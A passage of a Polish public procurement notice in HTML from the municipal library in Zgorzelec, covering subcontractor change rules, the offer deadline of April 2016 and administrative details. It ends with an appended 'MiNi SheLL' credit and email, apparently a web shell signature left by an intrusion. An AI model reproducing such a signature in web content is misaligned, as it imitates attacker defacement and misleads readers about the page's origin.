obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
-   Zmiana podwykonawcy możliwa będzie jedynie wtedy jeżeli zakres realizowanych przez podwykonawcę dostaw lub usług, nie ulegnie zmianie w stosunku do zakresu dostaw lub usług wskazanych w ofercie wykonawcy, a które zaplanował on do realizacji przez podwykonawcę. Zmiana taka możliwa będzie jedynie na uzasadniony wniosek Wykonawcy, do którego winien załączyć on  projekt umowy z podwykonawcą, przy czym wymagana jest w tym wypadku pisemna zgoda Zamawiającego na zawarcie przez Wykonawcę umowy z innym podwykonawcą,
-   Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca 
powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy Prawo Zamówień Publicznych, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub sam Wykonawca spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
-  Strona ubiegająca się o zmianę umowy, winna zwrócić się do Wykonawcy lub Zamawiającego, z pisemnym wnioskiem o zmianę umowy podając równocześnie uzasadnienie i podstawę takiej  zmiany. Strony ustalają termin 7 dniowy, licząc od dnia w którym zaistniały przesłanki do wprowadzenia takiej zmiany, na przekazanie w/w wniosku do Wykonawcy lub Zamawiającego.
-   Każda ze Stron oraz Odbiorca mogą jednostronnie dokonać zmiany w zakresie osób odpowiedzialnych za realizację umowy, osób upoważnionych do odbioru, numerów telefonów, faksów oraz adresów wskazanych w umowie, powiadamiając o tym pisemnie odpowiednio drugą Stronę. Zmiany te nie wymagają zmiany umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.biblioteka-zgorzelec.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejska Biblioteka Publiczne
59-900 Zgorzelec ul. Bohaterów Getta 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2016 godzina 12:30, miejsce: Miejska Biblioteka Publiczna
59-900 Zgorzelec
ul. Bohaterów Getta 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com